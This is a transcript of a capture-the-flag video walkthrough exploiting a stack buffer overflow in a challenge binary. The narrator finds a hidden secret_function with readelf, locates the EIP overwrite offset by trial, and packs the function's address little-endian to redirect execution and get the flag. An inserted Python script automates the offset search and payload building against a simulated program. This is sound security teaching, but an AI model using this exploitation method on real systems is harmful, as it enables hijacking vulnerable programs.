The first challenge in the extreme category from the Ryan Nicholson CTF is called "Every Day I'm Buffering," for a hundred points. So the challenge prompt here is: crash the program just right to retrieve the flag. So they give us a shell we can work with. Log in with ctf7 and challenge7, and ls, and we see that we have a program in our current directory that we can play with and work with. So if I run this program, it says "quit copying me" and it looks like it's waiting for input. So I submit something and it just spits our input back at us, and we're back to our prompt.

So, just kind of trying to gauge from the challenge title here, we can kind of safely say we're gonna end up doing a buffer overflow in this challenge. So this is the first time I've actually recorded doing a buffer overflow on video, and I'm pretty bad at trying to showcase this with lots of graphs and pictures and images of how the stack works and stuff like that. So hopefully there will be a little bit of suspended disbelief and you will understand, but I'm not going to show anything extra other than just me typing on the terminal. So hopefully it'll still be ingrained in your mind a little bit.

What I'm gonna do here is, for one thing, showcase my methodology, in that I wanted to do a little bit more file reconnaissance on this thing. So I wanted to see other strings in this binary, and I see other stuff that says "you found the secret function" and the flag.txt file, "the flag is blah blah blah." So there's nothing in here other than "you found the secret function," although that is peculiar, because it makes me wonder what we have to work with in this binary. So something that I'm going to actually use is called readelf, and you can use readelf -s to note the symbols that you want to get out of it, and then you give it the program or the binary that you're looking at, and this will list out all the different kinds of symbols. There's a lot here.
So if you wanted to strip this down, you can see things that are labeled as functions, and if you want to just grep for only those, we can grep -i for func. So we even see one result here for secret_function. So how do we get access to that, or how do we get that program to run the secret function? Because it didn't look like it printed that out for us when we ran it, and when we actually ran the program we weren't able to do anything other than enter something. So thus enters the notion of a buffer overflow.

So if I just spam garbage into this thing, it tries to spit it back out at me and it gives me a segmentation fault. So we've crashed the program at this point. Now if I want to know where things particularly crashed, or how I made this fault occur, I can run dmesg, and this is a lot of output in the webshell terminal here, so I'm going to pipe this into tail, and it says at the very, very last line: okay, program here had a segfault at 41414141 and instruction pointer 41414141. So what we've done is, actually, these capital A's are 0x41 when you look at them in hex. So what we've done is we have overflowed the buffer that was storing that input, and we have exceeded that cap and pushed outside, broke through the buffer limit, and now we're leaking onto the stack frame, and we've overwritten the return address that is stored at the very top of the stack. So now when our program would normally want to return to a different function rather than this input function, it isn't able to, because obviously there is no function residing at memory address 41414141. Normally this would just be the same function that we came from before, and it would be able to successfully return back to that function. But since we've overflowed it, we can control the IP, or the instruction pointer, to point it to wherever we really want it to go. Like if we wanted to go back to
the main function, we particularly could, or we could make it call the secret function. So we need some way to actually get to that memory address, 0x040... sorry, 0x0804853b, for secret_function. So we'll have to submit those and give them to the program as bytes.

First thing we need to do is figure out where the offset is, as to where we're getting that segfault, where we're overriding the EIP position. So kind of a trick that some people do here is actually use Python in one line to take advantage of the string multiplier here, and then pipe that output, which, if we have originally, that is 50 A's that we can give to the program, and we know we get a segfault. So let's try and shrink this down and find that offset as to where we overwrite EIP, or where we don't overwrite EIP. EIP being the register, E being 32-bit and IP being instruction pointer. So that didn't have an error. So let's try and do a little binary search in our own manual discussion here. 40: that gives us another segfault. So do we get any luck there? No. I want to see where we can get this 41414141 to change into what it should normally be. So let's try 35. Oh, okay, so that's changed a little bit. We're missing a byte here at the very, very end. So let's bring that down to 32. Oh, illegal instruction, core dump. So let's check that out: it says "traps: program trap invalid opcode." So something different than what we would normally expect here. But we tried 30. What about 31? Is that just the... okay? No segfault there. Is that just a threshold? Is that the balance? So let's try 33. Okay, now we get a segfault, and you can see that 41 is starting to leak into where it would normally be, overriding this instruction pointer here. If I added another, 34, the message, you can see another 41 just leaking in again. 35: how do we look here? 41 41 41.
So we can safely say that 32 is where we can start to access things, and let's verify that. Let's try 32 and then let's add BBBB. So now we can check that out and see we have a segfault at 42424242. So we have complete control: following our 32 A's, whatever we add afterwards, we'll go to that hex byte. So now we have to actually send this memory address in hex, but still keep the endianness, or keep the actual structure of that function written in memory. So we can take advantage of this by doing it in two ways.

I'm gonna get over to my terminal here in Python. If you import the struct module, and if you need some documentation on this, you can do `python struct`: interpret strings as packed binary data, and you can pack it into a specific format. Typically we want little-endian, because that's just how our Intel processors are, and I in this case will be an unsigned integer, so it's the number that we're looking for in memory. So you can do struct.pack with... I didn't have it copied correctly. secret_function, copy. Do we have it now? No, what the heck? Hey, webshell... And in fact that actually has to be the second argument. You have to specify the format and type first. So the less-than symbol, or walka-walka, and I denoted there, and the hex value that we're trying to convert into little-endian raw bytes. So just like this, and that's pretty handy. It doesn't make a whole lot of sense. If you actually have pwntools installed, you can use p32, or p64 if you're working with that data size. So you just pass that in as an argument and it will put it in proper little-endian format. So you can see this is just switching the bytes around into little-endian format and then using the backslash x to denote: okay, it's raw hex data.
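The offset probing and the struct.pack / p32 step from the walkthrough, as an added Python example that is not the video's own code: the 32-byte offset and the 0x0804853b address are the values found above, while `fake_program` is a constructed stand-in for the challenge binary (an assumed 32-byte buffer with the saved return address right after it), so the probing runs offline.

```python
import struct

SECRET_FUNCTION = 0x0804853b  # address the video reads out of `readelf -s` for secret_function

def p32(addr):
    """Little-endian 4-byte packing: what struct.pack('<I', addr) and pwntools' p32 do."""
    return struct.pack("<I", addr)

def crash_ip(raw4):
    """Interpret the 4 bytes that landed on saved EIP the way dmesg prints 'ip'
    (b'AAAA' -> 0x41414141)."""
    return struct.unpack("<I", raw4)[0]

def build_payload(offset, target):
    """Filler up to the saved return address, then the target as raw little-endian bytes."""
    return b"A" * offset + p32(target)

# Constructed stand-in for the challenge binary (assumption, not the real program):
# a 32-byte buffer with the saved return address immediately after it. Returns the
# value the CPU would load into EIP on return, i.e. what dmesg would show as 'ip'.
def fake_program(stdin, buf_size=32, saved_ret=0x08048500):
    frame = bytearray(p32(saved_ret))
    spill = stdin[buf_size:buf_size + 4]
    frame[:len(spill)] = spill          # short spills overwrite only the low bytes,
    return crash_ip(bytes(frame))       # which is the "41 leaking in" seen in dmesg

def find_eip_offset(oracle, max_len=64, marker=b"BBBB"):
    """Automate the video's manual 30/31/32/33 probing: grow the A filler until the
    4 marker bytes after it are exactly what the crash reports as EIP."""
    want = crash_ip(marker)
    for n in range(max_len):
        if oracle(b"A" * n + marker) == want:
            return n
    return None

if __name__ == "__main__":
    off = find_eip_offset(fake_program)
    print("offset:", off)                                         # 32
    print("ip with 34 A's:", hex(fake_program(b"A" * 34)))        # 0x8044141 (partial overwrite)
    print("ip with 50 A's:", hex(fake_program(b"A" * 50)))        # 0x41414141
    payload = build_payload(off, SECRET_FUNCTION)
    print("packed address:", payload[-4:])                        # b';\x85\x04\x08'
    print("ip with payload:", hex(fake_program(payload)))         # 0x804853b
```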
So now if I go ahead and supply this to our exploit, or our attack on the program: if I paste from the browser here to note that string, our 32 bytes for our overflow, and then overwrite EIP to the address of the secret function, it should return back and call that secret function, and we get it. It says "you found the secret function, the flag is by collateral." So, cool. We finally got that. We can go ahead and submit that for points, and we can keep track of it in our notes if we particularly want to, whatever. I'm just gonna type this out: by collateral. Cool.

So take note of that, if you wanted to create your own notes function as to how you went through that, or your notes file, to discover that secret function and convert its hex address into bytes. But that is a speed run of how to do a buffer overflow when there is a vulnerable function waiting for you in the binary. But you should always check for that, because most challenges have that set up. Cool.

Hey, I want to give a special shout-out to the people that love and support me on Patreon. I cannot say thank you enough. All of these people are awesome. $1 a month on Patreon will give you a special shout-out at the end of every video, just like this. $5 a month on Patreon will give you early access to everything I release on YouTube. If you did like this video, please do like, comment and subscribe. Check us out on Discord, join our Discord server, link in the description. And I hope to see you, maybe some love from Patreon. Cool. See you soon.